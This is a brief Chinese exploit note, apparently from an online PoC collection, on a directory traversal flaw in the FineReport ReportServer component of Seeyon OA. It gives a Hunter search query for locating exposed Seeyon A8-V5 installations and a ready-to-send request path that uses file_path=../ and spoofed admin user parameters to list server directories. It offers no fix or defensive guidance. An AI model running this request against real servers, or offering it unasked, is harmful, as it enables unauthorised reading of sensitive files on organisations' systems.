登录 白背景
源码

致远OA 帆软组件 ReportServer目录遍历漏洞

一、漏洞简介

致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息。

二、影响版本

  • 致远OA 帆软组件

三、资产测绘

  • hunterweb.title="致远A8-V5协同管理软件 V6.1sp1"
  • 特征

1697472255260-1eeec6ad-6f10-488d-9920-a2db6384488e.png

四、漏洞复现

/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true

1697472321910-2b540e62-c25e-4f06-b077-63a105782c58.png

原文: https://www.yuque.com/xiaokp7/ocvun2/rmi8gu6zoa8wppga